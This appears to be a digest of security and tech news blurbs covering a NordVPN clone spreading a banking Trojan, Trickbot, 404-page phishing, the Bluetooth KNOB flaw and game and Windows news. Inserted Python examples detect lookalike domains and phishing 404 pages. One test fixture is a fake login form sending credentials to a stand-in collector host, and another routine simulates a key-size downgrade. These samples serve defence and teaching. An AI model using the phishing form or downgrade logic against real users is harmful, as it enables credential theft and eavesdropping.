
The attackers who previously breached and abused the website of the free multimedia editor VSDC to distribute the Win32.Bolik.2 banking Trojan have now switched tactics. Where they previously hacked legitimate websites to hijack download links and point them at malware, the hackers are now creating website clones to deliver banking Trojans onto unsuspecting victims' computers. This lets them focus on adding capabilities to their malicious tools instead of spending time trying to infiltrate the servers and websites of legitimate businesses. More to the point, they are actively distributing the Win32.Bolik.2 banking Trojan via the nord-vpn[.]club website, an almost perfect clone of the official nordvpn.com site used by the popular NordVPN VPN service. The cloned website also has a valid SSL certificate issued by the open certificate authority Let’s Encrypt on August 3, with an expiration date of November 1. "Win32.Bolik.2 trojan is an improved version of Win32.Bolik.1 and has qualities of a multicomponent polymorphic file virus," state the Doctor Web researchers who spotted the campaign. "Using this malware, hackers can perform web injections, traffic intercepts, keylogging and steal information from different bank-client systems." The operators behind this malicious campaign launched their attacks on August 8; they are focusing on English-speaking targets and, according to the researchers, thousands have already visited the nord-vpn[.]club website in search of a download link for the NordVPN client. "The actor is interested in English speaking victims (US/CA/UK/AU). However, he can make exceptions if the victim is valuable," Doctor Web malware analyst Ivan Korolev told BleepingComputer. To learn more please visit OUR FORUM.
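A lookalike check of the kind a proxy or mail filter could run against domains like nord-vpn[.]club, added here as an example that is not part of the original article or of any Doctor Web tooling. The protected-brand table, the homoglyph map and the single-label suffix handling are assumptions made for the example.

```python
# Flag registrable domains that imitate a protected brand after stripping separators
# and common digit-for-letter swaps. Constructed brand table; extend as needed.
PROTECTED = {"nordvpn": "nordvpn.com"}

# Homoglyph / separator normalisation (assumed list, not exhaustive).
_NORMALISE = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "-": "", "_": ""})


def clean_host(host: str) -> str:
    """Lower-case, re-fang '[.]' and strip trailing dots so defanged indicators work."""
    return host.lower().replace("[.]", ".").strip(".")


def registrable_label(host: str) -> str:
    """Second-level label, e.g. 'nord-vpn' for 'www.nord-vpn.club'.
    Assumption: single-label public suffixes only (no co.uk-style handling)."""
    labels = clean_host(host).split(".")
    return labels[-2] if len(labels) >= 2 else labels[0]


def normalize(label: str) -> str:
    """'nord-vpn' -> 'nordvpn', 'n0rdvpn' -> 'nordvpn'."""
    return label.translate(_NORMALISE)


def lookalike_of(host: str):
    """Return (brand, legitimate_domain) when `host` imitates a protected brand on a
    domain that is not the brand's own; return None for the real site or unrelated hosts."""
    h = clean_host(host)
    for legit in PROTECTED.values():
        if h == legit or h.endswith("." + legit):
            return None  # the genuine domain or one of its subdomains
    label = normalize(registrable_label(h))
    for brand, legit in PROTECTED.items():
        if label == brand:
            return brand, legit
    return None


if __name__ == "__main__":
    for host in ("nord-vpn[.]club", "www.nordvpn.com", "n0rdvpn.net", "example.org"):
        print(host, "->", lookalike_of(host))
```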

Ubisoft continues to build upon Tom Clancy's Rainbow Six Siege, with its next major expansion close at hand. Following Operation Phantom Sight, the update is headed to the Latin American underworld, falling midway through its fourth year of content. Two new resourceful Operators lie on the horizon in Operation Ember Rise, set to shake up how defenders lock down the objective. We've wrapped up everything we know so far about Rainbow Six Siege's next season, ahead of its August 18 unveiling. Ubisoft has dropped its first teaser image for Year 4 Season 3, confirming the coming update's title, Operation Ember Rise. While Ubisoft is yet to outline its Operation Ember Rise release plans, a late-summer launch is expected for Xbox One, PlayStation 4, and PC. As with prior Rainbow Six Siege updates, the third season of 2019 drops two new playable Operators, expanding the ever-growing roster to 50 recruits. Outlined in Ubisoft's Year 4 roadmap, the latest members span independent counterterrorism units (CTUs), hailing from Mexican and Peruvian specialist forces. Expect new attacking and defending talent, sticking to a familiar seasonal template. While Ubisoft hasn't formally unveiled its upcoming Latin duo, brief teasers have surfaced throughout Year 4. Promotional assets for ringleader Harry "Six" Pandey made reference to narcotics crackdowns, singling out cartel activity in each Operator's home turf. Addressing a "Crosscheck w/ Capitao anti-drug operations for common ground" and "Antiquities trafficking," it establishes a clear future expansion beyond existing lore. The same pinboard also teased Operation Phantom Sight's Nøkk and Warden, alongside remaining threads still to uncover. For more complete details along with dates, more images and a video clip visit OUR FORUM.

Head for the hills, folks! It’s not often that we cover security here, but serious times call for serious talk. There is a trojan called Trickbot, and it is one of the stealthiest malware threats in recent memory. It doesn’t help that it is going after anything and everything that crosses its path. And to make matters worse, this is a rapidly evolving threat. The latest twist in its tale is that it is targeting Windows 10 users specifically via new methods that not only evade but actually disable Windows Defender on these systems. Trickbot may be in the news for all the wrong reasons these days, but this malware is not new. It has been causing trouble since 2016. Since then, this banking trojan is estimated to have compromised no less than 250 million email accounts. So much so that many in the cybersecurity world consider Trickbot the topmost threat targeting the computing landscape. This malware is designed with a laser focus on stealing the private data of users. Whether it be harvesting emails or stealing logins and passwords, hijacking web browsers or altering displayed websites, stealing banking details or transferring money out of crypto wallets, Trickbot is doing it all. The developers behind Trickbot have updated this malware numerous times over the years, adding advanced new traits every time. One of these features is screen locking, where the more recent versions of Trickbot are capable of locking the computer screens of the victims. What’s even worse, and an extremely dangerous addition, is the capability of hijacking several different kinds of applications and then stealing credentials, recording information relating to web browsing, as well as system details such as the CPU, operating system and running processes. Complete details can be found on OUR FORUM.

Microsoft security researchers discovered an unusual phishing campaign which employs custom 404 error pages to trick potential victims into handing over their Microsoft credentials. To do this, the attackers register a domain and, instead of creating a single phishing landing page to redirect their victims to, they configure a custom 404 page which shows the fake login form. This gives the phishers a virtually unlimited number of phishing landing page URLs generated from a single registered domain. "The 404 Not Found page tells you that you’ve hit a broken or dead link – except when it doesn’t," says Microsoft's research team. "Phishers are using malicious custom 404 pages to serve phishing sites. A phishing campaign targeting Microsoft uses such technique, giving phishers virtually unlimited phishing URLs." The custom 404 error pages these attackers use to harvest their victims' credentials are perfectly camouflaged as legitimate Microsoft account sign-in pages, down to the smallest details. All the links on the phishing page, including the ones at the bottom and the ones used to access one's Microsoft account and to create a new one, point straight to official Microsoft login forms in an effort to make targets less suspicious. The only elements missing from the phishing page are the "Sign-in options" link above the "Next" button and the cookies notification at the top of the page. "Because the malformed 404 pages are served to any non-existent URL in an attacker-controlled domain, the phishers can use random URLs for their campaigns," adds Microsoft. "We also found that the attackers randomize domains, exponentially increasing the number of phishing URLs." Learn more by visiting OUR FORUM.
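The property Microsoft describes, that every non-existent path on the domain returns the same credential form, is itself a detection signal. The probe below is an added example, not Microsoft's code or part of the original article: it requests a few random paths under a suspect domain and reports whether the not-found response carries a password field. The HTTP client is injected so the example runs offline against constructed responses; `collector.example` and the page bodies are made up for the demonstration.

```python
import re
import secrets
from typing import Callable, Dict, List, Tuple

Response = Tuple[int, str]            # (HTTP status code, response body)
Fetcher = Callable[[str], Response]   # injected client: url -> Response

PASSWORD_FIELD = re.compile(r"<input[^>]+type=[\"']?password", re.I)
FORM_ACTION = re.compile(r"<form[^>]+action=[\"']?([^\"'\s>]+)", re.I)


def probe_404(fetch: Fetcher, domain: str, samples: int = 3) -> Dict:
    """Request `samples` random, never-published paths under `domain` and report
    whether the server answers each of them with the same credential form."""
    statuses: List[int] = []
    bodies: List[str] = []
    for _ in range(samples):
        path = secrets.token_hex(8)                  # nobody links to this path
        status, body = fetch(f"https://{domain}/{path}")
        statuses.append(status)
        bodies.append(body)
    every_has_password = all(PASSWORD_FIELD.search(b) for b in bodies)
    identical_pages = len(set(bodies)) == 1         # random URLs, one page
    actions = {m.group(1) for b in bodies for m in FORM_ACTION.finditer(b)}
    return {
        "statuses": statuses,
        "serves_credential_form": every_has_password and identical_pages,
        "form_actions": sorted(actions),             # where submitted creds would go
    }


# Constructed responses standing in for a live server.
PHISH_404 = ('<html><form action="https://collector.example/post">'
             '<input name="loginfmt"><input type="password" name="passwd">'
             '</form></html>')
PLAIN_404 = "<html><h1>Not Found</h1></html>"


def fake_phish_server(url: str) -> Response:
    return 404, PHISH_404                # custom 404 page carrying a login form


def fake_normal_server(url: str) -> Response:
    return 404, PLAIN_404                # ordinary not-found page


if __name__ == "__main__":
    print(probe_404(fake_phish_server, "suspect.example"))
    print(probe_404(fake_normal_server, "benign.example"))
```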

A new Bluetooth vulnerability named "KNOB" has been disclosed that allows attackers to more easily brute force the encryption key used during pairing, letting them monitor or manipulate the data transferred between two paired devices. In a coordinated disclosure between the Center for IT-Security, Privacy and Accountability (CISPA), ICASI, and ICASI members such as Microsoft, Apple, Intel, Cisco, and Amazon, the new vulnerability called "KNOB" has been disclosed that affects Bluetooth BR/EDR devices, otherwise known as Bluetooth Classic, using specification versions 1.0 - 5.1. This flaw has been assigned CVE ID CVE-2019-9506 and allows an attacker to reduce the length of the encryption key used for establishing a connection. In some cases, an attacker could reduce the length of an encryption key to a single octet. "The researchers identified that it is possible for an attacking device to interfere with the procedure used to set up encryption on a BR/EDR connection between two devices in such a way as to reduce the length of the encryption key used," stated an advisory on Bluetooth.com. "In addition, since not all Bluetooth specifications mandate a minimum encryption key length, it is possible that some vendors may have developed Bluetooth products where the length of the encryption key used on a BR/EDR connection could be set by an attacking device down to a single octet." This reduction in key length would make it much easier for an attacker to brute force the encryption key used by the paired devices to communicate with each other. Once the key was known to the attackers, they could monitor and manipulate the data being sent between the devices. This includes potentially injecting commands, monitoring keystrokes, and other types of behavior. Full details are posted on OUR FORUM.
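The advisory's point is that the key size negotiation only protects devices that enforce a floor. The model below is an added example, not code from the article, CISPA or the Bluetooth SIG, and it is a simplified view of the negotiation rather than a bit-exact LMP implementation: each side has a maximum it supports and a minimum it will accept, the responder clamps the proposal to its maximum and rejects anything below its minimum, and an in-path tampering function models an attacker rewriting the proposed size. The 7-octet floor is the minimum the Bluetooth SIG recommended after the disclosure; the device names are constructed.

```python
from dataclasses import dataclass
from typing import Callable, Optional

RECOMMENDED_MIN_OCTETS = 7   # post-KNOB floor recommended by the Bluetooth SIG


@dataclass
class Device:
    name: str
    max_key_octets: int      # what the controller supports, at most 16
    min_key_octets: int      # policy floor; pre-KNOB firmware commonly accepted 1


def negotiate_key_size(initiator: Device, responder: Device,
                       tamper: Optional[Callable[[int], int]] = None) -> Optional[int]:
    """Simplified BR/EDR key size negotiation (assumption: not exact LMP behaviour).
    Returns the agreed key size in octets, or None if either side rejects."""
    proposed = initiator.max_key_octets
    if tamper:
        proposed = tamper(proposed)                  # attacker rewrites the request
    if proposed > responder.max_key_octets:
        proposed = responder.max_key_octets          # responder clamps to its maximum
    if proposed < responder.min_key_octets:
        return None                                  # responder refuses the size
    if tamper:
        proposed = tamper(proposed)                  # attacker rewrites the reply too
    if proposed < initiator.min_key_octets:
        return None                                  # initiator refuses the size
    return proposed


def brute_force_keyspace(octets: int) -> int:
    """Number of candidate keys an attacker must try for a key of `octets` bytes."""
    return 2 ** (8 * octets)


def harden(device: Device, floor: int = RECOMMENDED_MIN_OCTETS) -> Device:
    """Return a copy of `device` that refuses any key shorter than `floor` octets."""
    return Device(device.name, device.max_key_octets, max(device.min_key_octets, floor))


if __name__ == "__main__":
    phone, headset = Device("phone", 16, 1), Device("headset", 16, 1)
    downgrade = lambda size: 1                       # models the KNOB interference
    print("no attacker:", negotiate_key_size(phone, headset))
    print("legacy floor under attack:", negotiate_key_size(phone, headset, downgrade))
    print("7-octet floor under attack:", negotiate_key_size(harden(phone), harden(headset), downgrade))
```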

The company launches FastTrack for Windows 10 guidance, providing experts who can talk through deployment scenarios with partners. Microsoft Monday unveiled a new benefit for partners that are moving customers from Windows 7 to Windows 10, with the company now offering expert assistance around Windows 10 deployments. The end of support date for Windows 7 is set for Jan. 14, 2020, and Microsoft has made a series of investments to help with the transition, said Bob Davis, corporate vice president for Microsoft 365, in a blog post. The latest of these investments is the launch of FastTrack for Windows 10 deployment guidance. The benefit takes the form of free expert assistance on Windows 10 deployments for situations where there are at least 150 licenses of an eligible service or plan. "Sometimes you have a complex scenario and aren’t even sure where to start, or you’ve encountered a problem that has your migration stalled. There are times when you need to talk to an expert to get guidance on where to go next," Davis said.  FastTrack, Davis said in the post, will assist with envisioning a technical plan and determining how to deploy new users—and will continue to offer help throughout the deployment.

